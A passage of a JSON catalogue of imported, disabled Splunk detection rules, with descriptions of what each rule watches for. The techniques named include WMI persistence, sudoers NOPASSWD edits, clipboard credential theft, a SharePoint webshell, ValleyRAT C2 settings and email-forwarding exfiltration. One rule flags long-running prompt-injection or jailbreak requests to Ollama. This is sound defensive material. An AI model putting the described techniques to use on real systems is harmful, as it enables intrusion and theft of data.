Analysts should differentiate between legitimate administrative use and potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/script-execution-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aa73f80d-d728-4077-b226-81ea0c8be589", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/script_execution_via_wmi.yml" } }, { "id": "splunk-security-content-aac5df6f-9151-4da6-bdb2-5691aa6e376f", "type": "detection", "name": "Ollama Suspicious Prompt Injection Jailbreak", "description": "Detects potential prompt injection or jailbreak attempts against Ollama API endpoints by identifying requests with abnormally long response times. Attackers often craft complex, layered prompts designed to bypass AI safety controls, which typically result in extended processing times as the model attempts to parse and respond to these malicious inputs. 
This detection monitors /api/generate and /api/chat endpoints for requests exceeding 30 seconds, which may indicate sophisticated jailbreak techniques, multi-stage prompt injections, or attempts to extract sensitive information from the model.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-suspicious-prompt-injection-jailbreak.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aac5df6f-9151-4da6-bdb2-5691aa6e376f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_suspicious_prompt_injection_jailbreak.yml" } }, { "id": "splunk-security-content-aae66dc0-74b4-4807-b480-b35f8027abb4", "type": "detection", "name": "Linux Auditd Add User Account", "description": "The following analytic detects the creation of new user accounts on Linux systems using commands like \"useradd\" or \"adduser.\" It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as adversaries often create new user accounts to establish persistence on compromised hosts. 
If confirmed malicious, this could allow attackers to maintain access, escalate privileges, and further compromise the system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-add-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aae66dc0-74b4-4807-b480-b35f8027abb4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_add_user_account.yml" } }, { "id": "splunk-security-content-ab1e0d52-624a-11ec-8e0b-acde48001122", "type": "detection", "name": "Linux NOPASSWD Entry In Sudoers File", "description": "The following analytic detects the addition of NOPASSWD entries to the /etc/sudoers file on Linux systems. It leverages Endpoint Detection and Response (EDR) telemetry to identify command lines containing \"NOPASSWD:\". This activity is significant because it allows users to execute commands with elevated privileges without requiring a password, which can be exploited by adversaries to maintain persistent, privileged access. 
If confirmed malicious, this could lead to unauthorized privilege escalation, persistent access, and potential compromise of sensitive data and system integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-nopasswd-entry-in-sudoers-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ab1e0d52-624a-11ec-8e0b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_nopasswd_entry_in_sudoers_file.yml" } }, { "id": "splunk-security-content-ab3bcce0-a105-11eb-973c-acde48001122", "type": "detection", "name": "Wermgr Process Create Executable File", "description": "The following analytic detects the wermgr.exe process creating an executable file. It leverages Sysmon EventCode 11 to identify instances where wermgr.exe generates a .exe file. This behavior is unusual because wermgr.exe is typically associated with error reporting, not file creation. Such activity is significant as it may indicate TrickBot malware, which injects code into wermgr.exe to execute malicious actions like downloading additional payloads. 
If confirmed malicious, this could lead to further malware infections, data exfiltration, or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wermgr-process-create-executable-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ab3bcce0-a105-11eb-973c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wermgr_process_create_executable_file.yml" } }, { "id": "splunk-security-content-ab59d5ee-8694-4832-a332-cefcf66a9057", "type": "detection", "name": "Cisco Duo Policy Skip 2FA for Other Countries", "description": "The following analytic detects when a Duo policy is created or updated to allow access without two-factor authentication (2FA)\nfor users in countries other than the default. It identifies this behavior by searching Duo administrator activity logs for policy\ncreation or update actions where the policy description indicates that access is permitted without 2FA for certain user locations.\nThis is achieved by parsing the relevant fields in the logs and filtering for the specific condition of 'Allow access without 2FA.'\nThis behavior is significant for a Security Operations Center (SOC) because bypassing 2FA for any user group or location weakens\nthe organization's security posture and increases the risk of unauthorized access. 
Attackers or malicious insiders may exploit\nsuch policy changes to circumvent strong authentication controls, potentially leading to account compromise, data breaches, or\nlateral movement within the environment. Early detection of these policy modifications enables the SOC to investigate and respond\nbefore attackers can leverage the weakened controls, thereby reducing the risk and impact of a successful attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-skip-2fa-for-other-countries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ab59d5ee-8694-4832-a332-cefcf66a9057", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_skip_2fa_for_other_countries.yml" } }, { "id": "splunk-security-content-ab73289e-2246-4de0-a14b-67006c72a893", "type": "detection", "name": "Windows ClipBoard Data via Get-ClipBoard", "description": "The following analytic detects the execution of the PowerShell command 'Get-Clipboard' to retrieve clipboard data. It leverages PowerShell Script Block Logging (EventCode 4104) to identify instances where this command is used. This activity is significant because it can indicate an attempt to steal sensitive information such as usernames, passwords, or other confidential data copied to the clipboard. 
If confirmed malicious, this behavior could lead to unauthorized access to sensitive information, potentially compromising user accounts and other critical assets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-clipboard-data-via-get-clipboard.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ab73289e-2246-4de0-a14b-67006c72a893", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_clipboard_data_via_get_clipboard.yml" } }, { "id": "splunk-security-content-ab75dbb7-c3ba-4689-9c1b-8d2717bdcba1", "type": "detection", "name": "Linux Sqlite3 Privilege Escalation", "description": "The following analytic detects the execution of the sqlite3 command with elevated privileges, which can be exploited for privilege escalation. It leverages Endpoint Detection and Response (EDR) telemetry to identify instances where sqlite3 is used in conjunction with shell commands and sudo. This activity is significant because it indicates a potential attempt to gain root access, which could lead to full system compromise. 
If confirmed malicious, an attacker could execute arbitrary commands as root, leading to unauthorized access, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-sqlite3-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ab75dbb7-c3ba-4689-9c1b-8d2717bdcba1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_sqlite3_privilege_escalation.yml" } }, { "id": "splunk-security-content-abf39464-ed43-4d69-a56c-02750032a3fb", "type": "detection", "name": "Cisco Duo Policy Deny Access", "description": "The following analytic identifies instances where a Duo administrator creates or updates a policy to explicitly deny user access within the Duo environment. It detects this behavior by searching Duo administrator activity logs for policy creation or update actions where the authentication status is set to \"Deny access.\" By correlating these events with user and admin details, the analytic highlights potential misuse or malicious changes to access policies. This behavior is critical for a SOC to monitor, as unauthorized or suspicious denial of access policies can indicate insider threats, account compromise, or attempts to disrupt legitimate user access. 
The impact of such an attack may include denial of service to critical accounts, disruption of business operations, or the masking of further malicious activity by preventing targeted users from accessing resources. Early detection enables rapid investigation and remediation to maintain organizational security and availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-deny-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "abf39464-ed43-4d69-a56c-02750032a3fb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_deny_access.yml" } }, { "id": "splunk-security-content-abfb7cc5-c275-4a97-9029-62cd8d4ffeca", "type": "detection", "name": "Windows System Network Connections Discovery Netsh", "description": "The following analytic detects the execution of the Windows built-in tool netsh.exe to display the state, configuration, and profile of the host firewall. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process metadata. Monitoring this activity is crucial as netsh.exe can be used by adversaries to bypass firewall rules or discover firewall settings. 
If confirmed malicious, this activity could allow attackers to manipulate firewall configurations, potentially leading to unauthorized network access or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-network-connections-discovery-netsh.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "abfb7cc5-c275-4a97-9029-62cd8d4ffeca", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_network_connections_discovery_netsh.yml" } }, { "id": "splunk-security-content-ac30858b-7c25-4f0a-a7fa-bef036e49dc3", "type": "detection", "name": "Windows Execution of Microsoft MSC File In Suspicious Path", "description": "The following analytic detects when a Microsoft Management Console (MMC) process executes an .msc file in a suspicious path on a Windows system. While .msc files are legitimate components used for system administration, unexpected execution of these files by non-administrative processes or in unusual contexts can indicate malicious activity, such as living-off-the-land attacks, persistence mechanisms, or automated administrative abuse. This detection monitors process creation events, command-line arguments, and parent process relationships to help distinguish normal administrative usage from potential threats. 
Alerts should be investigated in the context of the process initiating the .msc file, the target system, and any subsequent network or system activity, as routine administrative tasks may also trigger this behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-execution-of-microsoft-msc-file-in-suspicious-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac30858b-7c25-4f0a-a7fa-bef036e49dc3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_execution_of_microsoft_msc_file_in_suspicious_path.yml" } }, { "id": "splunk-security-content-ac3311f5-661d-4e99-bd1f-3ec665b05441", "type": "detection", "name": "Windows Mail Protocol In Non-Common Process Path", "description": "The following analytic detects a Windows application establishing an SMTP connection from a non-common installation path. It leverages Sysmon EventCode 3 to identify processes not typically associated with email clients (e.g., Thunderbird, Outlook) making SMTP connections. This activity is significant as adversaries, including malware like AgentTesla, use such connections for Command and Control (C2) communication to exfiltrate stolen data. 
If confirmed malicious, this behavior could lead to unauthorized data exfiltration, including sensitive information like desktop screenshots, browser data, and system details, compromising the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mail-protocol-in-non-common-process-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac3311f5-661d-4e99-bd1f-3ec665b05441", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mail_protocol_in_non_common_process_path.yml" } }, { "id": "splunk-security-content-ac3b81c0-52f4-11ec-ac44-acde48001122", "type": "detection", "name": "Unusual Number of Computer Service Tickets Requested", "description": "The following analytic identifies an unusual number of computer service ticket requests from a single source, leveraging Event ID 4769, \"A Kerberos service ticket was requested.\" It uses statistical analysis, including standard deviation and the 3-sigma rule, to detect anomalies in service ticket requests. This activity is significant as it may indicate malicious behavior such as lateral movement, malware staging, or reconnaissance. 
If confirmed malicious, an attacker could gain unauthorized access to multiple endpoints, facilitating further compromise and potential data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unusual-number-of-computer-service-tickets-requested.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac3b81c0-52f4-11ec-ac44-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unusual_number_of_computer_service_tickets_requested.yml" } }, { "id": "splunk-security-content-ac490de2-ee39-421c-b61b-1c4005dde427", "type": "detection", "name": "Windows SharePoint Spinstall0 GET Request", "description": "The following analytic detects potential post-exploitation activity related to the Microsoft SharePoint CVE-2025-53770 vulnerability. After successful exploitation via the ToolPane.aspx endpoint, attackers typically deploy a webshell named \"spinstall0.aspx\" in the SharePoint layouts directory. This detection identifies GET requests to this webshell, which indicates active use of the backdoor for command execution, data exfiltration, or credential/key extraction. 
Attackers commonly use these webshells to extract encryption keys, authentication tokens, and other sensitive information from the compromised SharePoint server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003", "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sharepoint-spinstall0-get-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac490de2-ee39-421c-b61b-1c4005dde427", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/windows_sharepoint_spinstall0_get_request.yml" } }, { "id": "splunk-security-content-ac520039-21f1-4567-b528-5b7133dba76f", "type": "detection", "name": "Windows SSH Proxy Command", "description": "This detection identifies potential abuse of SSH \"ProxyCommand\" or \"LocalCommand\" by monitoring for suspicious process execution patterns.\nSpecifically, it looks for instances where ssh.exe (as a parent process) containing \"ProxyCommand\" or \"LocalCommand\" in its arguments spawns potentially malicious child processes like mshta, powershell, wscript, or cscript, or processes containing \"http\" in their command line.\nThis technique can be used by attackers to execute arbitrary commands through SSH proxy configurations, potentially enabling command & control activities or remote code execution. 
The detection focuses on commonly abused Windows scripting engines and web requests that may indicate malicious activity when spawned through SSH proxy commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1059.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ssh-proxy-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac520039-21f1-4567-b528-5b7133dba76f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ssh_proxy_command.yml" } }, { "id": "splunk-security-content-ac54d39e-a75d-4f42-971d-006db3a0423a", "type": "detection", "name": "Cisco Secure Firewall - Remote Access Software Usage Traffic", "description": "The following analytic detects network traffic associated with known remote access software applications\nthat are covered by Cisco Secure Firewall Application Detectors, such as AnyDesk, GoToMyPC, LogMeIn, and TeamViewer.\nIt leverages Cisco Secure Firewall Threat Defense Connection Event.\nThis activity is significant because adversaries often use remote access tools to maintain unauthorized access to compromised environments.\nIf confirmed malicious, this activity could allow attackers to control systems remotely, exfiltrate\ndata, or deploy additional malware, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, 
"playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-remote-access-software-usage-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac54d39e-a75d-4f42-971d-006db3a0423a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___remote_access_software_usage_traffic.yml" } }, { "id": "splunk-security-content-ac59298a-8d81-4c02-8c9b-ffdac993891f", "type": "detection", "name": "Windows Modify Registry ValleyRAT C2 Config", "description": "The following analytic detects modifications to the registry related to ValleyRAT C2 configuration. Specifically, it monitors changes in registry keys where ValleyRAT saves the IP address and port information of its command-and-control (C2) server. This activity is a key indicator of ValleyRAT attempting to establish persistent communication with its C2 infrastructure. By identifying these unauthorized registry modifications, security analysts can quickly detect malicious configurations and investigate the associated threats. 
Early detection of these changes helps prevent further exploitation and limits the malware\u2019s ability to exfiltrate data or control infected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-valleyrat-c2-config.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac59298a-8d81-4c02-8c9b-ffdac993891f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_valleyrat_c2_config.yml" } }, { "id": "splunk-security-content-ac7c4d0a-06a3-4278-aa59-88a5e537f981", "type": "detection", "name": "O365 New Email Forwarding Rule Enabled", "description": "The following analytic identifies the creation of new email forwarding rules in an Office 365 environment via the UpdateInboxRules operation. It leverages Office 365 management activity events to detect rules that forward emails to external recipients by examining the OperationProperties for specific forwarding actions. This activity is significant as it may indicate unauthorized email redirection, potentially leading to data exfiltration. 
If confirmed malicious, attackers could intercept sensitive communications, leading to data breaches and information leakage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-new-email-forwarding-rule-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac7c4d0a-06a3-4278-aa59-88a5e537f981", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_new_email_forwarding_rule_enabled.yml" } }, { "id": "splunk-security-content-ac90b339-13fc-4f29-a18c-4abbba1f2171", "type": "detection", "name": "AWS Exfiltration via EC2 Snapshot", "description": "The following analytic detects a series of AWS API calls related to EC2 snapshots within a short time window, indicating potential exfiltration via EC2 Snapshot modifications. It leverages AWS CloudTrail logs to identify actions such as creating, describing, and modifying snapshot attributes. This activity is significant as it may indicate an attacker attempting to exfiltrate data by sharing EC2 snapshots externally. 
If confirmed malicious, the attacker could gain access to sensitive information stored in the snapshots, leading to data breaches and potential compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-exfiltration-via-ec2-snapshot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ac90b339-13fc-4f29-a18c-4abbba1f2171", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_exfiltration_via_ec2_snapshot.yml" } }, { "id": "splunk-security-content-acb3ea33-70f7-47aa-b335-643b3aebcb2f", "type": "detection", "name": "Linux Auditd Possible Access Or Modification Of Sshd Config File", "description": "The following analytic detects access, deletion or modification of the ssh_config file on Linux systems.\nIt leverages data from Linux Auditd, focusing on events of type PATH with a nametype of (\"NORMAL\", \"CREATE\", \"DELETE\").\nThis activity could be significant because unauthorized changes to ssh_config can allow threat actors to redirect port connections or use unauthorized keys, potentially compromising the system.\nCorrelate this with related EXECVE or PROCTITLE events to identify the process or user responsible for the access or modification.\nIf confirmed malicious, this could lead to unauthorized access, privilege escalation, or persistent backdoor access, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [ "T1098.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-possible-access-or-modification-of-sshd-config-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "acb3ea33-70f7-47aa-b335-643b3aebcb2f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_possible_access_or_modification_of_sshd_config_file.yml" } }, { "id": "splunk-security-content-acb5dc74-5324-11ec-a36d-acde48001122", "type": "detection", "name": "Unusual Number of Remote Endpoint Authentication Events", "description": "The following analytic identifies an unusual number of remote authentication attempts from a single source by leveraging Windows Event ID 4624, which logs successful account logons. It uses statistical analysis, specifically the 3-sigma rule, to detect deviations from normal behavior. This activity is significant for a SOC as it may indicate lateral movement, malware staging, or reconnaissance. 
If confirmed malicious, this behavior could allow an attacker to move laterally within the network, escalate privileges, or gather information for further attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unusual-number-of-remote-endpoint-authentication-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "acb5dc74-5324-11ec-a36d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unusual_number_of_remote_endpoint_authentication_events.yml" } }, { "id": "splunk-security-content-accb0712-c381-11eb-8e5b-acde48001122", "type": "detection", "name": "Modification Of Wallpaper", "description": "The following analytic detects the modification of registry keys related to the desktop wallpaper settings. It leverages Sysmon EventCode 13 to identify changes to the \"Control Panel\\\\Desktop\\\\Wallpaper\" and \"Control Panel\\\\Desktop\\\\WallpaperStyle\" registry keys, especially when the modifying process is not explorer.exe or involves suspicious file paths like temp or public directories. This activity is significant as it can indicate ransomware behavior, such as the REVIL ransomware, which changes the wallpaper to display a ransom note. 
If confirmed malicious, this could signify a compromised machine and the presence of ransomware, leading to potential data encryption and extortion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1491" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/modification-of-wallpaper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "accb0712-c381-11eb-8e5b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/modification_of_wallpaper.yml" } }, { "id": "splunk-security-content-ad03bfcf-8a91-4bc2-a500-112993deba87", "type": "detection", "name": "System User Discovery With Query", "description": "The following analytic detects the execution of `query.exe` with command-line arguments aimed at discovering logged-in users. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as adversaries may use `query.exe` to gain situational awareness and perform Active Directory discovery on compromised endpoints. 
If confirmed malicious, this behavior could allow attackers to identify active users, aiding in further lateral movement and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/system-user-discovery-with-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ad03bfcf-8a91-4bc2-a500-112993deba87", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/system_user_discovery_with_query.yml" } }, { "id": "splunk-security-content-ad05aae6-3b2a-4f73-af97-57bd26cee3b9", "type": "detection", "name": "WMI Permanent Event Subscription - Sysmon", "description": "The following analytic identifies the creation of WMI permanent event subscriptions, which can be used to establish persistence or perform privilege escalation. It leverages Sysmon data, specifically EventCodes 19, 20, and 21, to detect the creation of WMI EventFilters, EventConsumers, and FilterToConsumerBindings. This activity is significant as it may indicate an attacker setting up mechanisms to execute code with elevated SYSTEM privileges when specific events occur. 
